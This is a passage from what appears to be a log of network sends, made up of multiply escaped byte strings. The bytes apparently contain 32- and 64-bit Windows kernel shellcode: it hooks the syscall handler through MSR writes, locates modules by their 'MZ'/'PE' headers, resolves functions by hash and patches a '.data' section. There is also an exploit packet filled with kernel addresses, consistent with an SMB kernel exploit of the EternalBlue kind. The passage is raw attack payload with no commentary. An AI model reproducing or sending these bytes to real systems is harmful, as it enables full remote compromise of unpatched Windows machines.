c[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 7, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1